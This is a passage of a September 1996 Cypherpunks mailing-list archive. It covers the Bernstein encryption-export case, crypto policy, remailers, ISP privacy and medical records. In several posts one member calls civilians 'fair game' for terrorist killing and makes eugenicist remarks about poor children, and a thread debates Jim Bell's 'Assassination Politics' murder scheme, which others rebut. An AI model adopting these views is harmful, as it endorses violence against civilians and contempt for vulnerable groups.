than me meant that he was the one who needed to convince her," Cohn said. Coppolino declined to comment. LICENSE TO 'SNUFFLE' Filed in February 1995, the suit challenges provisions of the International Traffic in Arms Regulation Act, which classifies encryption programs as "munitions" and subjects them to strict export controls. In October 1993, the U.S. State Department told Bernstein he would need an arms export license to post his "Snuffle" encryption program and accompanying documentation to an Internet discussion group. He subsequently filed suit seeking to have the requirement declared unconstitutional. After Patel's April ruling, the case now turns on whether restrictions on the export of such software and accompanying "technical data" amount to prior restraint, which can only be exercised extremely narrowly. High-tech companies are closely watching the case, having complained bitterly for years that the law has crippled their ability to compete in the global software market. Particularly in the burgeoning arena of Internet and network-related software products, encryption features are considered essential to protect sensitive data transmissions from unauthorized access. Legislative attempts at relaxing export laws so far have been unsuccessful. A bill now before the Senate Commerce Committee has received stiff opposition from the Clinton administration, and even its supporters say it is unlikely the bill will pass this term. But Stanton McCandlish, a spokesman for the Electronic Frontier Foundation - a group that advocates extending civil liberties into digital media such as the Internet - said the so-called Pro-CODE bill sponsored by Sen. Conrad Burns, R-Mont, could be made moot by Bernstein's case. "If we get the ruling we're looking for," he said, "and it's affirmed at the Supreme Court level, which is pretty likely, the Pro-CODE bill is probably not needed at all." (retyping by NLA, newspaper liberation army.) From azur at netcom.com Tue Sep 24 16:57:00 1996 From: azur at netcom.com (Steve Schear) Date: Wed, 25 Sep 1996 07:57:00 +0800 Subject: Where to write crypto? Message-ID: I believe Taiwan might be an excellent location to have 'clear room' crypto work done. Taiwan has a very large skilled software labor pool and isn't a member of COCOM. PGP Fingerprint: FE 90 1A 95 9D EA 8D 61 81 2E CC A9 A4 4A FB A9 --------------------------------------------------------------------- Snoop Daty Data | Internet: azur at netcom.com Grinder | Voice: 1-702-655-2877 Sacred Cow Meat Co. | Fax: 1-702-658-2673 7075 W. Gowan Road, #2148 | Las Vegas, NV 89129 | --------------------------------------------------------------------- Just say NO to prescription DRUGS. "Of all tyrannies, a tyranny sincerely exercised for the good of its victims may be the most oppressive." -- C.S. Lewis "Surveillence is ultimately just another form of media, and thus, potential entertainment." -- G. Beato From harmon at tenet.edu Tue Sep 24 17:05:04 1996 From: harmon at tenet.edu (Dan Harmon) Date: Wed, 25 Sep 1996 08:05:04 +0800 Subject: AP [was: Re: Kiddie porn on the Internet] [NOISE] In-Reply-To: Message-ID: HERE, HERE! On Mon, 23 Sep 1996, Sandy Sandfort wrote: > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > SANDY SANDFORT > . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . > > C'punks, > > On Mon, 23 Sep 1996, Dr.Dimitri Vulis KOTM wrote: > > > There is no such thing as an "ordinary citizen". When the U.S. commits > > war crimes in Korea, Viet Nam, Grenada, Panama, Somalia, Iraq, and elsewhere, > > every American taxpayer is an accomplice and a fair game. > > Illogical collectivist claptrap. When a taxpayer is targeted by > terrorists, he has been victimized twice--first by the government > that stole his money, second by the terrorist that punished him > for the (alleged) acts others commited with that money. If a > mugger buys a gun with the money he took from me, am I then > responsible for the murder he commits with it? Clearly not. > This line of "reasoning" is nothing more than a sad variant of > the old, "blame the victim" game. For shame. > > Let's bring this back to crypto for a moment. Dimitri's "logic" > must necessarily lead one to the conclusion that Cypherpunks (at > least those in the US) are responsible for whatever draconian > restrictions "our" government puts on free speech, crypto or > whatever. John Gilmore, Philip Zimmermann, Whit Diffie and > others will be chagrined to learn this, I'm sure. > > Dimitri needs to learn what it means to be an adult. Everyone is > totally responsible for what they do, but ONLY for what THEY do. > No one is responsible for the unassisted, willful acts of others. > > > S a n d y > > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > > > From whgiii at amaranth.com Tue Sep 24 17:09:19 1996 From: whgiii at amaranth.com (William H. Geiger III) Date: Wed, 25 Sep 1996 08:09:19 +0800 Subject: WARNING: This Message Actually Contains a Question Reguarding Crypto! Message-ID: <199609241649.LAA22238@mailhub.amaranth.com> Hi, I just recently downloaded copies of Blowfish & Ghost. Does anyone have any experiance with these two algorithims? How do they comare to RSA, DES, 3DES, IDEA ? I can across a post awhile back that mentioned that they were using Blowfish in PGPPhone. Can anyone confirm this? Does anyone know how they are using Blowfish and why? Thanks, -- ----------------------------------------------------------- William H. Geiger III http://www.amaranth.com/~whgiii Geiger Consulting WebExplorer & Java Enhanced!!! Merlin Beta Test Site - WarpServer SMP Test Site Author of PGPMR2 - PGP Front End for MR/2 Ice Look for MR/2 Tips & Rexx Scripts Get Work Place Shell for Windows!! PGP & MR/2 the only way for secure e-mail. Finger whgiii at amaranth.com for PGP Key and other info ----------------------------------------------------------- From andrew_loewenstern at il.us.swissbank.com Tue Sep 24 17:36:08 1996 From: andrew_loewenstern at il.us.swissbank.com (Andrew Loewenstern) Date: Wed, 25 Sep 1996 08:36:08 +0800 Subject: Eudora 3 EMS API stuff In-Reply-To: Message-ID: <9609241818.AA00638@ch1d157nwk> Someone at qualcomm writes (forwarded by ddt at lsd.com): > Abstractly speaking, the EMS API is most suited for performing > transformations, conversions and some other forms of processing > on email messages as they are sent and received by Eudora. > > In practice it is very useful for encryption, digital signatures, > and compression. ahh, a classic instance of "crypto with a hole" ... andrew From pgf at acadian.net Tue Sep 24 17:40:24 1996 From: pgf at acadian.net (Phil Fraering) Date: Wed, 25 Sep 1996 08:40:24 +0800 Subject: provably hard PK cryptosystems In-Reply-To: <3247E194.3F54BC7E@systemics.com> Message-ID: On Tue, 24 Sep 1996, Gary Howland wrote: > I fail to see *any* (non educational) use for these DNA "computers", let > alone a cryptographic use - sure, they may be massively parallel, but > what's the big deal? I can now perform a calculation a million times > faster than I could yesterday? (something I personally doubt, but will > agree to for sake of the argument). I could get the same results > writing a cycle stealing Internet java app, so what's all the fuss > about? It sounds to me like your argument abstracts thusly: "Personally, I fail to see the point to the development of more powerful computers, since I can always steal time from other people's current technology computers." One could make this statement about _all_ advances in processor technology. And it boils down to this: you're not paying for it, so you don't see the point in getting more bang for the buck. People who are paying for it, and have neither the inclination nor the ability to steal, do see the point of getting more bang for the buck. And eventually even you'll benefit, when you find yourself writing a java applet to freeload processor time on someone else's DNA computer. Meanwhile, processor technology will have advanced because many people went out and paid for faster (Intel/PowerPC/PowerDNA/Whatever) CPU's. Not because you freeloaded off of someone else. > -- > pub 1024/C001D00D 1996/01/22 Gary Howland > Key fingerprint = 0C FB 60 61 4D 3B 24 7D 1C 89 1D BE 1F EE 09 06 > Phil Fraering The above is the opinion of neither my internet pgf at acadian.net service provider nor my employer. 318/261-9649 "Pinky, your brain waves are giving The Amazing Kreskin a pounding headache." From hua at chromatic.com Tue Sep 24 17:45:15 1996 From: hua at chromatic.com (Ernest Hua) Date: Wed, 25 Sep 1996 08:45:15 +0800 Subject: Good article on inevitability of unregulated crypto ... Message-ID: <199609242141.OAA05593@ohio.chromatic.com> http://www.zdnet.com/intweek/print/960624/cover/doc1.html This, of course, is not any indication that we should not stay vigilant. As is clear from every public statement by the past and present administrations, they have an agenda to protect their monopoly on intelligence gathering. They clearly have a strong interest in hamstringing every single challenge to the current regulations. If ITAR is torn down, then they will use the OECD and other international organizations to stop the flow of encryption. It is NOT useful to reason with them. It takes direct confrontation using legislation and court case battles to fix this problem. Ern From rah at shipwright.com Tue Sep 24 18:17:02 1996 From: rah at shipwright.com (Robert Hettinga) Date: Wed, 25 Sep 1996 09:17:02 +0800 Subject: Barlow/Taylor censorship debate In-Reply-To: Message-ID: At 4:23 pm -0400 9/23/96, Roderick Simpson wrote: > Bruce Taylor, over I *really* wish people would use his *whole* name, so we don't confuse him with the other Bruce Taylors on the net. His whole name is: Bruce "Penis With a Blister On It" Taylor. Since that's the phrase he kept repeating over and over at CFP96, it *must* be his middle name... I'll save the joke about lawyers and neckties for another occasion. ;-). Cheers, Bob Hettinga ----------------- Robert Hettinga (rah at shipwright.com) e$, 44 Farquhar Street, Boston, MA 02131 USA "'Bart Bucks' are not legal tender." -- Punishment, 100 times on a chalkboard, for Bart Simpson The e$ Home Page: http://www.vmeng.com/rah/ From rah at shipwright.com Tue Sep 24 18:43:11 1996 From: rah at shipwright.com (Robert Hettinga) Date: Wed, 25 Sep 1996 09:43:11 +0800 Subject: ISPs' information on users Message-ID: --- begin forwarded text X-Sender: rodney at pop3.pn.com Mime-Version: 1.0 Date: Tue, 24 Sep 1996 08:57:01 -0400 To: dcsb at ai.mit.edu From: Rodney Thayer Subject: ISPs' information on users Sender: bounce-dcsb at ai.mit.edu Precedence: bulk Reply-To: Rodney Thayer Something to think about before any of us start selling Ketchup on-line via E-cash... >Date: Sun, 22 Sep 1996 23:53:02 -0400 >From: darius at world.std.com (Darius Thabit) >Subject: ISPs' information on users >Date: Sun, 22 Sep 1996 01:18:59 -0700 (PDT) >From: Phil Agre > >=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= >This message was forwarded through the Red Rock Eater News Service (RRE). >Send any replies to the original author, listed in the From: field below. >You are welcome to send the message along to others but please do not use >the "redirect" command. For information on RRE, including instructions >for (un)subscribing, send an empty message to rre-help at weber.ucsd.edu >=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= > >Date: Fri, 20 Sep 1996 19:16:19 +0200 >From: steve at isys.hu (Steven Carlson) >To: hungary-online-announce at hungary.yak.net >Subject: (HOL-A) It's a Brave Old World > > ------------------------------ > Brave Old World: > Reflections on Europe in the Digital Age > by Steven Carlson; 20 Sep 1996 > ------------------------------ > > ** So Much Fuss About A Bottle Of Ketchup > > Hungarian police recently sent a fax around to the local Internet > service providers (ISPs) asking them to provide lists of their users > in Esztergom, a small town outside of Budapest. It seems somebody > had planted a bomb in a bottle of ketchup. Since everyone knows you > can download bomb-making instructions from the Internet, the police > figured they should investigate the local users. No, I'm not making > this up. > > What's more, nearly every local ISP gave the police this information. > Fortunately my company has no users in Esztergom and so that's what we > told the police. We got off lucky. Believe me, as much as might want > to make a stand for privacy of information my company is NOT eager to > do battle with the Hungarian authorities. > > But that's what it might take. Because if the Hungarian police really > understood the Internet they could have asked for even more. For > example, it would only take a few keystrokes to forward a users' mail > to the authorities. The police might also have asked for old email, > since many ISPs back this up routinely. > > But that's not all. Some ISPs run caching servers, machines that store > frequently-viewed webpages so that users access them locally rather > than across the net. An ISP's caching server could give the police a > profile of what web pages the users have been browsing. > > I'm not trying to scare anyone. My point is that sharing information > on the Internet is a two-way street. Computers keep extensive records. > Using the Internet often means you leave a trail behind you. This is > part of life in the digital age. > > This "electronic trail" is not unique to the Internet. Every time you > use a credit card you create a record in several computers. Other > computers may be storing information about you such as your medical > history, driving record, tax filings and so on. The more we rely on > computers to manage our affairs, the more information that may be "out > there." This means citizens in the digital age should know their > rights. > > Many governments already have laws to protect private information. For > example, the US has many laws restricting access to sensitive > information such as medical and credit records. You might be surprised > to know Hungary passed a law in 1991 to prevent misuse of information > associated with the national identity card. > > Yet the growth of new technologies is outpacing legislation. For > example, Holland and other countries are experimenting with "smart > road" systems that can identify the licence number of a moving car for > purposes of toll collection. Cellular phones and satellite navigation > systems can report the locations of their users. It's not difficult to > imagine how these and other technologies could be abused. > > Of course, now you know that even your local Internet provider has > access to some rather sensitive information about you. This leads me > to ask: what sort of service is your Internet provider actually > offering? > > When it comes down to it, your ISP is like your doctor, your lawyer, > your accountant or your psychiatrist. Each of these professionals > deals with your data; each profession is governed by a code of ethics, > written or implicit. Moreover these limits are codified in law. If > your accountant allowed your competitors to read the company books, > you could take him to court. > > Similarly, your Internet provider has an implicit duty to protect the > privacy of your communication. Most professionals in my industry > recognize this. I know most of the people working in Hungarian > Internet and I doubt very much that they are reading your mail or > mine. But they don't know where they stand in the eyes of the law. > > Internet professionals should certainly assist the police in a > legitimate investigation. But should every Internet user in Esztergom > be investigated just because they could (theoretically) find > bomb-making information on the Internet? > > To hammer that point home a local Internet-based magazine has > published, in Hungarian, complete bomb-making instructions: > . In other > words, if you've read this far you may be the subject of a future > investigation. Have a nice day! > > > > ** Further Links: > > The Electronic Frontier Foundation > > The International Electronic Rights Server > > The Electronic Privacy Information Center > > > ---------------------------------------------------- > Copyright (c) 1996. Permission granted to redistribute this article in > electronic form for non-profit purposes only. My byline and this message > must remain intact. Contact me for reprint rights. >----------------------------------------------------- > > > > > --- from Rodney Thayer +1 617 332 7292 --- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ To unsubscribe from this list, send a letter to: Majordomo at ai.mit.edu In the body of the message, write: unsubscribe dcsb Or, to subscribe, write: subscribe dcsb If you have questions, write to me at Owner-DCSB at ai.mit.edu --- end forwarded text ----------------- Robert Hettinga (rah at shipwright.com) e$, 44 Farquhar Street, Boston, MA 02131 USA "'Bart Bucks' are not legal tender." -- Punishment, 100 times on a chalkboard, for Bart Simpson The e$ Home Page: http://www.vmeng.com/rah/ From dlv at bwalk.dm.com Tue Sep 24 18:48:13 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Wed, 25 Sep 1996 09:48:13 +0800 Subject: LACC: Re: Australia now has information police In-Reply-To: Message-ID: <4DuRuD1w165w@bwalk.dm.com> s1113645 at tesla.cc.uottawa.ca writes: > > > On Sun, 22 Sep 1996, Julian Assange wrote: > > > [re COCOM trade agreements] > > > > All COCOM countries most likely. That said Australia does not seem to be > > Didn't the COCOM treaty expire? No; rather the COCOM members had a meeting and voted to dissolve it. It happened some time around 1992 or 93, I think. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From attila at primenet.com Tue Sep 24 19:05:43 1996 From: attila at primenet.com (attila) Date: Wed, 25 Sep 1996 10:05:43 +0800 Subject: SAY WHAT? [Hallam-Baker demands more repudiations or he'll write!] In-Reply-To: Message-ID: <199609242306.RAA23971@InfoWest.COM> In , on 09/24/96 at 03:19 PM, Simon Spero said: = .On Tue, 24 Sep 1996, attila wrote: = .> = .> go back to your beloved England and your labour unions = . your roots are showing :-) ----^ REALLY? = .> NO, I will not outright reject Jim Bell's "Assassination = .> Politics." = .Assasination politics is impossible to defend from a classical = .Liberal/Libertarian position. Bell advocates arbitrary applications = .of violence and coercion without restriction. There is no way to = .justify the initiation of force without abandoning any pretence of = .being a Libertarian (which, to be fair, Bell doesn't claim to be). all very true. but I will defend Jim Bell's rights to propose them, even if Bell is more than a few cards short of a full deck. -- Politicians are like diapers. They both need changing regularly, and for the same reason. From guthery at snailbox.com Tue Sep 24 20:07:35 1996 From: guthery at snailbox.com (Scott Guthery) Date: Wed, 25 Sep 1996 11:07:35 +0800 Subject: Tamper-Resistant Software from INTEL Message-ID: <199609242330.SAA16789@oak.zilker.net> Has anybody heard of tamper-resistant software in general or a method for tamper-resistant software from Intel in particular? -*-*-*-*-*-*-*- http://www.snailbox.com -*-*-*-*-*-*-*- Scott Guthery Home: 1 512 266 1278 The SnailBox Work: 1 512 331 3774 12417 River Bend #6 FAX: 1 512 331 3059 Austin, Texas 78732 Email: guthery at snailbox.com From jfricker at vertexgroup.com Tue Sep 24 20:14:45 1996 From: jfricker at vertexgroup.com (John Fricker) Date: Wed, 25 Sep 1996 11:14:45 +0800 Subject: FLITE is now on the web Message-ID: <19960924225444242.AAA196@dev.vertexgroup.com> -----BEGIN PGP SIGNED MESSAGE----- http://www.fedworld.gov/supcourt/index.htm 7000 supreme court decisions from 1937 to 1975 -----BEGIN PGP SIGNATURE----- Version: 2.9 iQCVAgUBMkhnzbuA0owOB/fpAQEKWwQArJwMFrL5kVXSYfNC9I8T8bzi+8D8Zdma vZj84TB+2KmW28wuFvbxnVE02MT4DMkwTYR8NQpGfAxsHHkOCOzkasdVB1IRpnpP RUuZsyQ3Iabm3q7INywMcy+c+u+5bl6stzYAlKVypsmPYJh0J9TSnhH5zN+xdowG /6dj+90GGNc= =/4qd -----END PGP SIGNATURE----- From dlv at bwalk.dm.com Tue Sep 24 20:18:47 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Wed, 25 Sep 1996 11:18:47 +0800 Subject: AP In-Reply-To: <9609241952.aa26911@salmon.maths.tcd.ie> Message-ID: Derek Bell writes: > In message <6XJquD10w165w at bwalk.dm.com>, "Dr.Dimitri Vulis KOTM" writes: > >There is no such thing as an "ordinary citizen". When the U.S. commits > >war crimes in Korea, Viet Nam, Grenada, Panama, Somalia, Iraq, and elsewhere > >every American taxpayer is an accomplice and a fair game. Likewise, any > >Britih subject is fair game for IRA's self-defense against centuries of > >British genocide and oppression. > > An odd attitude to take - personally, I only hold people responsible > for what they did, not what their government did. In Dimitri's scenario, > the IRA could justify killing any British citizen for the British government' > actions - even if that citizen _supported_ the IRA or agreed with its aims. Yes, I do. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From teddygee at visi.net Tue Sep 24 20:21:52 1996 From: teddygee at visi.net (Ted Garrett) Date: Wed, 25 Sep 1996 11:21:52 +0800 Subject: Anonymous remailer information In-Reply-To: <199609240502.AAA14766@radish.interlink-bbs.com> Message-ID: On Tue, 24 Sep 1996, Super User wrote: > Hello! > > Thank you for your interest in our anonymous service. We > believe our remailer to be the best on the 'Net. Wasn't aware I'd asked for any information regarding your 'anonymous' service. Whether you believe it to be the best on the net or not, I was completely unaware of it's existence. > The service costs $5.00 a month and will allow you to send > mail anywhere on the internet with a false ("spoofed") return > address. THIS IS INTENDED FOR ENTERTAINMENT PURPOSES ONLY! Hmm... I've heard of remailers being run for legitimate reasons like protecting freedom of speech, allowing a means to disseminate information anonymously, and simply protecting the identity of the person sending the message, but never for ENTERTAINMENT PURPOSES ONLY... > Q: How does the service work? Ok, I'll bite.. > A: You simply send your letter to anon at interlink-bbs.com, > following the format which we will detail when you > subscribe, and your letter will be remailed with the new > return address. Don't I encrypt it first with the public key of your remailer? Otherwise, how can I instruct the mailer which next hops to make? And since I'm sending all this in the clear to your remailer, don't I end up being open for a man in the middle attack, traffic analysis, and just plain anybody with a sniffer on my ISPs terminal servers. > Q: Can I post to USENET with your remailer? > A: Yes, if you use a gateway. We will provide complete > instructions at your request (assuming you have an account). Ah, so I can post the hundreds of kiddie porn pics I have through your service and be moderately untraceable? > Q: Can I send files? > A: If you uuencode them first, yes. Well, naturally. Most mail systems on the internet have serious problems digesting binary objects. Oh, I guess you were expecting that I'd use the Microsoft Mailer... > Q: May I test your service for free? > A: No. Yet another question I didn't ask. > Q: Does anyone ever complain about receiving mail which > has been forwarded from InterLink? > A: Sometimes. What we do is we block the address of > the complainer so that no more mail may be forwarded to > that address. Sounds like a plan. Can I have my name removed from your unsolicited mailing list this way? When I start running a remailer service, I think I'll adopt that strategy, if possible. Of course, MY remailer will be a cypherpunks style remailer or a mixmaster. And it'll be free, too. Of course, people will need to know a little bit about crypto and privacy to use it... but hey, ya gotta keep out the riff-raff somehow. > Repeated complaints will result in your account being closed. > This has not been a problem in the past, however, perhaps > because no one knew to whom a complaint could be sent! Or perhaps because no one in their right minds believes your remailer to be anonymous. From hallam at ai.mit.edu Tue Sep 24 20:25:49 1996 From: hallam at ai.mit.edu (hallam at ai.mit.edu) Date: Wed, 25 Sep 1996 11:25:49 +0800 Subject: Fruitcake Politics cont. [Noise] Message-ID: <9609250011.AA24972@etna.ai.mit.edu> >You're wrong on at least three counts: I absolutely do claim to be a >libertarian, for one. And Mr Dupont claims to be the Dalai Lama... >Secondly, while I advocate a system which I call AP, >I do not "advocate" the MISUSE of that system for the act of attacking >people who have no initiated force or fraud. In the diatribe you proceed to spew forth you define "fraud" as tax collection. In other words you are calling for the murder of the members of the IRS. I don't consider your position to be distinguishable from that of the Oaklahoma city bombers. Interestingly enough the paragraph that begins by claiming there are at least three points runs out of steam after only two. In fact it is not argued from a classical libertarian or liberal position as claimed. The classical liberal position is that there are no rights without law so AP is self contradictory. I consider the authority of Rawls and Cohen on this one somewhat more persuasive than Bell. Mills certainly argues from this position but I can't claim to have discussed it with Mills :-) I don't think that Nozdic would accept the argument either. It is entirely from false analogies. In law the right of self defense is limited. You are not entitled to kill someone if you fear that they might tread on your toe. The force used has to be both necessary and commensurate. To argue that one is entitled to murder IRS agents because you disagree with the legitimacy of taxes is certainly not a liberal position. It also wont do to disown the consequences of the scheme. Of course it would be the perfect scheme for getting rid of unwanted spouses etc. Simply dismissing this as an "unfortunate" side effect is not credible. Its like Teller's scheme to build a second panama canal using A bombs, describing the radiation damage caused as an unfortunate side effect. Phill From camcc at abraxis.com Tue Sep 24 21:24:28 1996 From: camcc at abraxis.com (camcc at abraxis.com) Date: Wed, 25 Sep 1996 12:24:28 +0800 Subject: [EFG] Fwd: Ga. Internet Law Challenged Message-ID: <2.2.32.19960925010103.00679840@smtp1.abraxis.com> >X-Sender: smcclain at pop.atl.mindspring.com >Date: Tue, 24 Sep 1996 16:47:07 -0400 >To: efg-action at ninja.techwood.org >Reply-To: efg-action at ninja.techwood.org > >>From: AOLNewsProfiles at aol.net >>Date: 96-09-24 15:25:54 EDT >> >>.c The Associated Press >> ATLANTA (AP) -- The American Civil Liberties Union and computer >>activists filed suit Tuesday challenging a new Georgia law they >>contend restricts free speech in cyberspace. >> ``Fundamental civil liberties are as important in cyberspace as >>they are in traditional contexts,'' said Ann Beeson, an ACLU >>attorney who specializes in computer law. >> Plaintiffs in the suit filed in federal court also include state >>Rep. Mitch Kaye, R-Marietta, who fought the law's passage, and >>Electronic Frontiers Georgia, a computer liberties organization. >> The law took effect July 1. It bars computer users from falsely >>identifying themselves, a provision which critics contend makes it >>illegal to use pseudonyms in electronic messages sent by computer. >>Some computer services allow users to send messages that identify >>them only by a pseudonym or account number. >> The law also makes it a crime for someone to use a company's >>trademark or symbol without permission. Critics argue that could >>make criminals of Web page owners who have established links to >>help users move quickly from their pages to those of corporate >>America. >> Robert Costner of Electronic Frontiers Georgia said that aspect >>of the law could subject his own group to penalties because its Web >>page provides a link to BellSouth's page to assist computer users >>in contacting the company about a recent rate increase. >> Rep. Don Parsons, R-Marietta, who steered the law to passage, >>has said critics are overreacting. >> The law only makes it illegal for a person to misrepresent >>himself on the network, posing as someone or something else, he >>noted. >> ``If somebody uses that type of data, such as a trade name, to >>identify themselves as some other organization, then they clearly >>are seeking to defraud,'' Parsons said last spring. >> Gov. Zell Miller signed the bill April 18 despite a warning from >>the attorney general that it was vague and a plea for a veto from >>the San Francisco-based Electronic Frontier Foundation, which >>called the measure an unconstitutional restraint on free speech >>rights. >> Ms. Beeson said the suit appears to be the first legal challenge >>in the country to an individual state's attempt to regulate the >>Internet. >> ``If 50 states pass 50 contradictory laws, Internet users will >>be virtually paralyzed for fear of violating one or more of those >>laws,'' she said. >> AP-NY-09-24-96 1523EDT >> Copyright 1996 The Associated Press. The information >>contained in the AP news report may not be published, >>broadcast, rewritten or otherwise distributed without >>prior written authority of The Associated Press. From jamesd at echeque.com Tue Sep 24 22:05:07 1996 From: jamesd at echeque.com (James A. Donald) Date: Wed, 25 Sep 1996 13:05:07 +0800 Subject: We removed radikal 154 from xs4all :( Message-ID: <199609242023.NAA10037@dns1.noc.best.net> At 09:28 AM 9/24/96 -0400, pjb at ny.ubs.com wrote: > i was under the impression that germany's goal was to stop the distribution > of radikal 154 by xs4all, not by 50 mirror sites. they seem to have > accomplished their goal. do you really think that they will let a little > thing like reason stand in their way when claiming victory? Your impression was wrong. Let us just run through the sequence of events. A bunch of leftover commies publish some boring commie crap in Germany, which probably most people would have ignored. Thugs with truncheons shut them up, making large numbers of "preventative" arrests. (A "preventative" arrest is when you have done nothing illegal, let alone wrong, but they arrest you anyway.) Result: big publicity on the internet, dead silence in the "free" german press. Germany tries to shut up the internet. Result: Even bigger publicity. Sounds like a defeat for Germany to me. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From jamesd at echeque.com Tue Sep 24 22:08:24 1996 From: jamesd at echeque.com (James A. Donald) Date: Wed, 25 Sep 1996 13:08:24 +0800 Subject: We removed radikal 154 from xs4all :( Message-ID: <199609242023.NAA10030@dns1.noc.best.net> At 05:32 PM 9/23/96 -0700, Timothy C. May wrote: > That xs4all eventually capitulated has to be seen as a win for Germany. That the net community did not capitulate has to be seen as a loss for Germany. > They will probably now turn their sights on other sites (no pun intended), > hoping to pick off each one in turn. If they do, it will make The church of scientology look like a minor squabble. Every time one site capitulates, it will inspire two dozen others to join the fray. I joined the fight *because* xs4all had to capitulate. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From dlv at bwalk.dm.com Tue Sep 24 22:09:51 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Wed, 25 Sep 1996 13:09:51 +0800 Subject: Public Schools In-Reply-To: Message-ID: <20uRuD1w165w@bwalk.dm.com> Phil Fraering writes: > On Mon, 23 Sep 1996, Dr.Dimitri Vulis KOTM wrote: > > > > > U.S. public school system is darwinian evolution in action. Parents who can > > afford to send their kids to private schools, do so. Parents who send their > > kids to public schools deserve to have their offsprings fucked up, mentally > > and phsyically, to improve the species' gene pool. > > But the cutoff is often whether the parents can afford to send their kids > to private school, not whether or not they're genetically superior. You must have attended a public school if you don't understand that geentic superiority leads to economic success. My older kid goes to a private school. The parents are obviously genetically superior to public school parents. > And the reason it costs so much to send a kid to private school is that > everyone's already paying for a more expensive public school thanks to all > the taxes. Push vouchers. What's the cryptorelevance of your comments, anyway? > > There are plenty of excellent private elementary and secondary schools in t > > U.S. Children who deserve better schooling (by virtue of having parents who > > have better genes and are therefore economically successful) get it. > > So if I'm economically successful it'll change my genes? > > I guess this is the famous Russian belief in Lamarkianism in action. No, on the contrary, sending poor kids to good schools on scholarships does not improve their genes. They tend to become drug dealers. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From tcmay at got.net Tue Sep 24 22:19:02 1996 From: tcmay at got.net (Timothy C. May) Date: Wed, 25 Sep 1996 13:19:02 +0800 Subject: Medical Data Message-ID: In the public discussions about "medical data bases" and "medical account numbers," the key issue is being missed. Namely, Why can't patients carry their _own_ medical records, and disclose what they wish to disclose to doctors and hospitals, as they see fit? Whether implemented in a high-tech version, as a "smart card," or a low-tech version, as a "dossier" (a file folder), the principle's the same. (I'll get to insurance companies in a moment.) There is little incentive (*) that I can imagine for any patient to deliberately lie on his records, as such lying usually harms himself by providing misleading information to someone who is trying to help him--I mention this because presumably one of the reasons hospitals and whatnot keep the records is fear that the records will be altered or not fully reported. Medical records appear to be a perfect example of Chaum's "selective disclosure of credentials," or even "credentials without identity." (* There is of course some incentive to lie or withold medical information if the patient deems it invasive of his privacy, or something that he does not want on records accessible to others. But in a _specific medical treatment_, for example, he gains little by denying that he had measles as a child, or that he has used IV drugs. Provided he can disclose this information without being added to a data base--e.g., by using selective disclosure of information (and not his name)--the incentives for lying are small, possibly negative.) Insurers would of course be worried about falsification of records. This can be handled in several ways. Digitally-signed statements from hospitals or test services could be required, depending on the policies of the insurers--the holder of the files, such as the patient, would be unable to fake or alter such records. Still, when one asks another party to make a "bet" about one's health, which is what insurance of course is, it's not surprising that they would want to see to independent verification of one's assertions. This is largely separable from the issue of disclosing to doctors and hospitals medical information. The comparison that is often made between credit records and medical records is flawed. Credit records are the items of data _from other people_, e.g., the persons one has borrowed from, the landlords one has rented from, etc. And with credit records, a person is often inclined to falsify or withold items (though this is also solved partly with digital signatures, though not perfectly). (There are some interesting links with object-oriented programming, with patient-objects able to maintain their own state. Not true of creditee-objects, who are not the owners of the credit worthiness judgments of others.) This could be an area where actual progress can be made. While many people, and regulators, have concerns about untraceable digital cash, it is likely that the _public_ would find it hard to buy the argument that patients being responsible for their own medical records would be a dire threat to the Republic! Thus, while carrying one's own credit record is mostly unworkable, carrying one's own medical records is completely feasible, and solves many privacy problems. --Tim May (I hope I fixed any scrambled paragraphs...my Mac crashed again (it's been crashing several times a day, what with all the various semi-incompatible versions of the Mac OS, extensions, new programs, etc., I have) and I had to recover the text of what I'd been typing from one of those dreaded--but very useful--"keystroke capture" programs.) We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From rpandya at netcom.com Tue Sep 24 22:21:17 1996 From: rpandya at netcom.com (Ravi Pandya) Date: Wed, 25 Sep 1996 13:21:17 +0800 Subject: Private Information Retrieval Message-ID: <2.2.32.19960924222443.006964e8@netcom7.netcom.com> This work looks like it might be of interest to readers of this list. Ravi --- On Tue, 24 Sep 1996 14:52:08 -0700 (PDT) Scott Dakins wrote: UNIVERSITY OF WASHINGTON Seattle, Washington 98195 Department of Computer Science and Engineering Box 352350 (206) 543-1695 COLLOQUIUM SPEAKER: Benny Chor, Technion, Haifa, Israel TITLE: Private Information Retrieval DATE: Wednesday, September 25, 1996 TIME: 3:30 pm PLACE: 422 Sieg Hall HOST: Richard Karp ABSTRACT: Publicly accessible databases are an indispensable resource for retrieving up to date information. But they also pose a significant risk to the privacy of the user, since a curious database operator 